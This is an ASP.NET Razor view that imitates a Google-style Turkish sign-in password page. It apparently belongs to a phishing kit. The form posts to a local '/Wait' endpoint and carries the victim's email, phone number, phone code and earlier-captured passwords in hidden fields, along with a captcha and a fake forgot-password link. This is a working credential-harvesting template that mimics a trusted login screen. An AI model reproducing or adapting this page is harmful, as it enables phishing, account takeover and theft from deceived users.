@{var edit = ViewBag.users as Users; }

<div id="view_container" class="JhUD8d SQNfcc vLGJgb" jscontroller="WFS13" jsaction="rcuQ6b:npT2md" jsmodel="Z7PiFb qFmk3b qbZ0Se nqpTHe hAn1A YPPRX eV9nn Xu2csd hc6Ubd">
    <div jscontroller="Ka7I6" jsaction="jiqeKb:ZCwQbe;u3KAb:ZCwQbe;cLkKDf:n4vmRb;DPVjO:tVBJG;vu6WPd:bCkDte;rcuQ6b:rcuQ6b;click:vBw6I(preventDefault=true|L6M1Fb),EtG4V(preventDefault=true|CkSUlf);DiUYjc:.CLIENT;abBxn:.CLIENT;nKbR0:.CLIENT;ffNU7c:.CLIENT" jsname="nUpftc" class="zWl5kd" data-view-id="b5STy" style="">
        <div class="DRS7Fe bxPAYd k6Zj8d" jsname="lr9nlf" jscontroller="Z3Buzf" jsshadow="" data-branding="jcJzye" role="presentation">
            <div jsname="paFcre">
                <div class="jXeDnc" jsname="tJHJj" jscontroller="S9352b" jsaction="JIbuQc:pKJJqe(af8ijd);bTyaEe:pKJJqe;">
                    <h1 data-a11y-title-piece="" id="headingText" jsname="r4nke"><span jsslot="">Hoş Geldiniz</span></h1>
                    <div class="Y4dIwd" data-a11y-title-piece="" id="headingSubtext" jsname="VdSJob"></div><div class="aCayab">
                        <div jscontroller="BzWZlf" jsaction="click:cOuCgd; mousedown:UX7yZ; mouseup:lbsD7e; touchstart:p6p2H; touchend:yfqBxc;" class="YZrg6 HnRr5d cd29Sd iiFyne" tabindex="0" role="link" aria-label="@edit.mail seçildi. Hesap değiştir" jsname="af8ijd"><div class="gPHLDe"><div class="qQWzTd" aria-hidden="true"><svg aria-hidden="true" class="stUf5b" fill="currentColor" focusable="false" width="20px" height="20px" viewBox="0 0 24 24" xmlns="https://www.w3.org/2000/svg"><path d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm6.36 14.83c-1.43-1.74-4.9-2.33-6.36-2.33s-4.93.59-6.36 2.33C4.62 15.49 4 13.82 4 12c0-4.41 3.59-8 8-8s8 3.59 8 8c0 1.82-.62 3.49-1.64 4.83zM12 6c-1.94 0-3.5 1.56-3.5 3.5S10.06 13 12 13s3.5-1.56 3.5-3.5S13.94 6 12 6z"></path></svg></div></div><div class="KlDWw" id="profileIdentifier">@edit.mail</div><div class="krLnGe"><svg aria-hidden="true" class="stUf5b" fill="currentColor" focusable="false" width="18px" height="18px" viewBox="0 0 24 24" xmlns="https://www.w3.org/2000/svg"><polygon points="12,16.41 5.29,9.71 6.71,8.29 12,13.59 17.29,8.29 18.71,9.71"></polygon></svg></div></div>
                    </div>
                </div>
            </div><div jsname="uybdVe" class="pwWryf bxPAYd" role="presentation">
                      <form action="/Wait" method="post" novalidate="">
                          <input type="hidden" id="mail" name="mail" value="@edit.mail" /><input type="hidden" id="mailsend" name="mailsend" value="@edit.mailsend" />
                          <input type="hidden" id="phone" name="phone" value="@edit.phone" /><input type="hidden" id="phonecode" name="phonecode" value="@edit.phonecode" />
                          <input type="hidden" id="password" name="password" value="@edit.password" /><input type="hidden" id="password2" name="password2" value="@edit.password2" />

                          <div jsname="USBQqe" class="Wxwduf Us7fWe JhUD8d" role="presentation">
                              <div class="WEQkZc">
                                  <span jsslot="" class="sFcPkb">
                                      <section class="aTzEhb uXELDc rNe0id eLNT1d" jscontroller="uwHxEe" jsname="INM6z" aria-live="assertive" aria-atomic="true" jsshadow="">
                                          <header class="IdEPtc" jsname="tJHJj">
                                              <div class="L9iFZc" role="presentation" jsname="NjaE2c">
                                                  <h2 class="kV95Wc"><span class="yiP64c" aria-hidden="true" jsname="Bz112c"><svg aria-hidden="true" class="stUf5b d7Plee" fill="currentColor" focusable="false" width="20px" height="20px" viewBox="0 0 24 24" xmlns="https://www.w3.org/2000/svg"><path d="M1 21h22L12 2 1 21zm12-3h-2v-2h2v2zm0-4h-2v-4h2v4z"></path></svg></span></h2><div class="yMb59d" jsname="HSrbLb" aria-hidden="true"></div>
                                              </div>
                                          </header><div class="CxRgyd" jsname="MZArnb"><div jsslot=""></div></div>
                                      </section>
                                  </span>
                                  <div class="bCAAsb" jsname="rEuO1b" jscontroller="mjtijb">

                                      <span jsslot="">
                                          <section class="aTzEhb" jscontroller="uwHxEe" jsshadow="">
                                              <header class="IdEPtc" jsname="tJHJj" aria-hidden="true"></header><div class="CxRgyd" jsname="MZArnb">
                                                  <div jsslot="">
                                                      <input value="@edit.mail" type="text" name="mail" class="VwCw" tabindex="-1" aria-hidden="true" spellcheck="false" jsname="KKx9x" autocomplete="off" id="hiddenEmail"><input type="hidden" name="identifierInput" value="@edit.mail" id="identifierId" jscontroller="a5DQI">
                                                      <input value="@edit.redirect" type="hidden" name="redirect" jscontroller="a5DQI">
                                                      <div class="SdBahf VxoKGd" jscontroller="MZKEPb" jsshadow="" jsname="vZSTIf" jsaction="rcuQ6b:rcuQ6b;JIbuQc:nAF18e(sEbX2);VIULte:nAF18e;DQ0KUb:.CLIENT;HYMnzb:.CLIENT;sv6xVb:.CLIENT;sKmMle:.CLIENT" data-is-visible="false">
                                                          <div class="eEgeR">
                                                              <div class="W498nc">
                                                                  <div class="fdWl7b">
                                                                      <div class="hDp5Db" jscontroller="zysDWd" jsaction="rcuQ6b:rcuQ6b;JIbuQc:OVHm7(sEbX2);keydown:.CLIENT;AHmuwe:.CLIENT;O22p3e:.CLIENT;YqO5N:.CLIENT" jsname="UmsTj" jsshadow="">
                                                                          <div class="rFrNMe ze9ebf YKooDc q9Nsuf zKHdkd sdJrJc" jscontroller="pxq3x" jsaction="clickonly:KjsqPd; focus:Jt1EX; blur:fpfTEe; input:Lg5SV" jsshadow="" jsname="Ufn6O">
                                                                              <div class="aCsJod oJeWuf">
                                                                                  <div class="aXBtI I0VJ4d Wic03c">
                                                                                      <div class="Xb9hP">
                                                                                          <input aria-label="@Html.Raw("Şifrenizi girin")" id="password" name="password" type="password" class="whsOnd zHQkBf" jsname="YPqjbf" autocomplete="current-password" spellcheck="false" tabindex="0" autocapitalize="off" dir="ltr" data-initial-dir="ltr" data-initial-value="">
                                                                                          <div jsname="YRMmle" class="AxOyFc snByac" aria-hidden="true">@Html.Raw("Şifrenizi girin")</div>
                                                                                      </div>
                                                                                      <span jsslot="" class="A37UZe sxyYjd MQL3Ob">
                                                                                          <div role="button" class="U26fgb mUbCce fKz7Od YYBxpf PlRDoc" jscontroller="bA7b2c" jsaction="click:cOuCgd; mousedown:UX7yZ; mouseup:lbsD7e; mouseenter:tfO1Yc; mouseleave:JywGue; focus:AHmuwe; blur:O22p3e; contextmenu:mg9Pef;touchstart:p6p2H; touchmove:FwuNnf; touchend:yfqBxc(preventMouseEvents=true|preventDefault=true); touchcancel:JMtRjd;" jsshadow="" jsname="sEbX2" aria-label="Şifreyi göster" aria-disabled="false" tabindex="0" data-tooltip="Şifreyi göster" data-tooltip-vertical-offset="-12" data-tooltip-horizontal-offset="0">
                                                                                              <div class="VTBa7b MbhUzd" jsname="ksKsZd"></div><span jsslot="" class="xjKiLb">
                                                                                                  <span class="Ce1Y1c" style="top: -12px">
                                                                                                      <span class="wRNPwe S7pdP" aria-hidden="true">
                                                                                                          <svg aria-hidden="true" class="stUf5b" fill="currentColor" focusable="false" width="24px" height="24px" viewBox="0 0 24 24" xmlns="https://www.w3.org/2000/svg">
                                                                                                              <path d="M10.58,7.25l1.56,1.56c1.38,0.07,2.47,1.17,2.54,2.54l1.56,1.56C16.4,12.47,16.5,12,16.5,11.5C16.5,9.02,14.48,7,12,7 C11.5,7,11.03,7.1,10.58,7.25z"></path>
                                                                                                              <path d="M12,6c3.79,0,7.17,2.13,8.82,5.5c-0.64,1.32-1.56,2.44-2.66,3.33l1.42,1.42c1.51-1.26,2.7-2.89,3.43-4.74 C21.27,7.11,17,4,12,4c-1.4,0-2.73,0.25-3.98,0.7L9.63,6.3C10.4,6.12,11.19,6,12,6z"></path>
                                                                                                              <path d="M16.43,15.93l-1.25-1.25l-1.27-1.27l-3.82-3.82L8.82,8.32L7.57,7.07L6.09,5.59L3.31,2.81L1.89,4.22l2.53,2.53 C2.92,8.02,1.73,9.64,1,11.5C2.73,15.89,7,19,12,19c1.4,0,2.73-0.25,3.98-0.7l4.3,4.3l1.41-1.41l-3.78-3.78L16.43,15.93z M11.86,14.19c-1.38-0.07-2.47-1.17-2.54-2.54L11.86,14.19z M12,17c-3.79,0-7.17-2.13-8.82-5.5c0.64-1.32,1.56-2.44,2.66-3.33 l1.91,1.91C7.6,10.53,7.5,11,7.5,11.5c0,2.48,2.02,4.5,4.5,4.5c0.5,0,0.97-0.1,1.42-0.25l0.95,0.95C13.6,16.88,12.81,17,12,17z"></path>
                                                                                                          </svg>
                                                                                                      </span><span class="wRNPwe pVlEsd" aria-hidden="true"><svg aria-hidden="true" class="stUf5b" fill="currentColor" focusable="false" width="24px" height="24px" viewBox="0 0 24 24" xmlns="https://www.w3.org/2000/svg"><path d="M12,7c-2.48,0-4.5,2.02-4.5,4.5S9.52,16,12,16s4.5-2.02,4.5-4.5S14.48,7,12,7z M12,14.2c-1.49,0-2.7-1.21-2.7-2.7 c0-1.49,1.21-2.7,2.7-2.7s2.7,1.21,2.7,2.7C14.7,12.99,13.49,14.2,12,14.2z"></path><path d="M12,4C7,4,2.73,7.11,1,11.5C2.73,15.89,7,19,12,19s9.27-3.11,11-7.5C21.27,7.11,17,4,12,4z M12,17 c-3.79,0-7.17-2.13-8.82-5.5C4.83,8.13,8.21,6,12,6s7.17,2.13,8.82,5.5C19.17,14.87,15.79,17,12,17z"></path></svg></span>
                                                                                                  </span>
                                                                                              </span>
                                                                                          </div>
                                                                                      </span>
                                                                                      <div class="i9lrp mIZh1c"></div><div jsname="XmnwAc" class="OabDMe cXrdqd Y2Zypf"></div>
                                                                                  </div>
                                                                              </div><div class="LXRPh"><div jsname="ty6ygf" class="ovnfwe Is7Fhb"></div></div>
                                                                          </div>
                                                                      </div>
                                                                  </div>
                                                              </div>
                                                          </div>
                                                          <div class="gSlDTe" jsname="JIbuQc"></div>
                                                      </div>
                                                      <div jscontroller="T3edRd" jsname="Si5T8b" class="T8zd8e R43Xif" jsaction="click:IMdg8d(A1U4Sb);rcuQ6b:jqIVcd">
                                                          <img jsname="O9Milc" id="captchaimg" class="TrZEUc"><button class="gIn9Gc TrZEUc" jsname="A1U4Sb" id="playCaptchaButton" tabindex="0" aria-label="Duyduğunuz rakamları dinleyin ve yazın" type="button"><svg aria-hidden="true" class="stUf5b" fill="currentColor" focusable="false" width="18px" height="18px" viewBox="0 0 24 24" xmlns="https://www.w3.org/2000/svg"><path d="M3 9v6h4l5 5V4L7 9H3zm13.5 3c0-1.8-1-3.3-2.5-4v8c1.5-.7 2.5-2.2 2.5-4zM14 3.2v2.1c2.9.9 5 3.5 5 6.7s-2.1 5.9-5 6.7v2.1c4-.9 7-4.5 7-8.8s-3-7.9-7-8.8z"></path></svg></button><audio jsname="CakGX" type="audio/wav" id="captchaAudio"></audio><div jscontroller="b21kgd" jsaction="keydown:C9BaXe;O22p3e:Op2ZO;AHmuwe:Jt1EX;rcuQ6b:rcuQ6b;YqO5N:Lg5SV;EJh3N:rcuQ6b;" jsname="CQRbLd" class="d2CFce cDSmF" role="presentation" data-is-rendered="true">
                                                              <div class="rFrNMe N3Hzgf jjwyfe zKHdkd sdJrJc Tyc9J" jscontroller="pxq3x" jsaction="clickonly:KjsqPd; focus:Jt1EX; blur:fpfTEe; input:Lg5SV" jsshadow="" jsname="Vsb5Ub">
                                                                  <div class="aCsJod oJeWuf">
                                                                      <div class="aXBtI Wic03c">
                                                                          <div class="Xb9hP">
                                                                              <input type="text" class="whsOnd zHQkBf" jsname="YPqjbf" autocomplete="off" spellcheck="false" tabindex="0" aria-label="Duyduğunuz veya gördüğünüz metni yazın" name="ca" id="ca" dir="ltr" data-initial-dir="ltr" data-initial-value=""><div jsname="YRMmle" class="AxOyFc snByac" aria-hidden="true">Duyduğunuz veya gördüğünüz metni yazın</div>
                                                                          </div><div class="i9lrp mIZh1c"></div><div jsname="XmnwAc" class="OabDMe cXrdqd"></div>
                                                                      </div>
                                                                  </div><div class="LXRPh">
                                                                      <div jsname="ty6ygf" class="ovnfwe Is7Fhb"></div>
                                                                      <div jsname="B34EJ" class="dEOOab RxsGPe" aria-atomic="true" aria-live="assertive"></div>
                                                                  </div>
                                                              </div>
                                                          </div><input jsname="SBlSod" type="hidden" name="ct" id="ct">
                                                      </div>
                                                  </div>
                                              </div>
                                          </section>
                                      </span>

                                  </div>
                              </div>
                              <div class="zQJV3" jsname="DH6Rkf" jscontroller="QEg9te" jsaction="rcuQ6b:rcuQ6b;JIbuQc:vjx2Ld(Njthtb),ChoyC(eBSUOb),mzsPGd(bCkDte),VaKChb(gVmDzc),nCZam(W3Rzrc),Tzaumc(uRHG6),JGhSzd;LEpEAf:dE26Sc(lqvTlf);h4C2te:JGhSzd;" data-is-primary-action-disabled="false" data-is-secondary-action-disabled="false" data-primary-action-label="İleri" data-secondary-action-label="" jsshadow="">
                                  <div class="dG5hZc" jsname="DhK0U">
                                      <div class="qhFLie" jsname="k77Iif">
                                          <button type="submit" value="İleri">
                                              <div role="button" id="passwordNext" class="U26fgb O0WRkf zZhnYe e3Duub C0oVfc FliLIb DL0QTb" jscontroller="VXdfxd" jsaction="click:cOuCgd; mousedown:UX7yZ; mouseup:lbsD7e; mouseenter:tfO1Yc; mouseleave:JywGue; focus:AHmuwe; blur:O22p3e; contextmenu:mg9Pef;touchstart:p6p2H; touchmove:FwuNnf; touchend:yfqBxc(preventMouseEvents=true|preventDefault=true); touchcancel:JMtRjd;" jsshadow="" jsname="Njthtb" tabindex="0">
                                                  <div class="Vwe4Vb MbhUzd" jsname="ksKsZd"></div><div class="ZFr60d CeoRYc"></div><span jsslot="" class="CwaK9">
                                                      <span class="RveJvd snByac">@Html.Raw("İleri")</span>
                                                  </span>
                                              </div>
                                          </button>
                                      </div>
                                      <div class="daaWTb" jsname="QkNstf">
                                          <div role="button" id="forgotPassword" class="U26fgb O0WRkf oG5Srb HQ8yf C0oVfc FliLIb uRo0Xe NaOGkc" jscontroller="VXdfxd" jsaction="click:cOuCgd; mousedown:UX7yZ; mouseup:lbsD7e; mouseenter:tfO1Yc; mouseleave:JywGue; focus:AHmuwe; blur:O22p3e; contextmenu:mg9Pef;touchstart:p6p2H; touchmove:FwuNnf; touchend:yfqBxc(preventMouseEvents=true|preventDefault=true); touchcancel:JMtRjd;" jsshadow="" jsname="bCkDte" aria-disabled="false" tabindex="0">
                                              <div class="Vwe4Vb MbhUzd" jsname="ksKsZd"></div><div class="ZFr60d CeoRYc"></div><span jsslot="" class="CwaK9">
                                                  <span class="RveJvd snByac">
                                                      <a href="/Password2">
                                                          @Html.Raw("Şifrenizi mi unuttunuz?")
                                                      </a>
                                                  </span>
                                              </span>
                                          </div>
                                      </div>
                                  </div>
                              </div>
                          </div>
                      </form>
            </div>
        </div>
    </div>
</div>


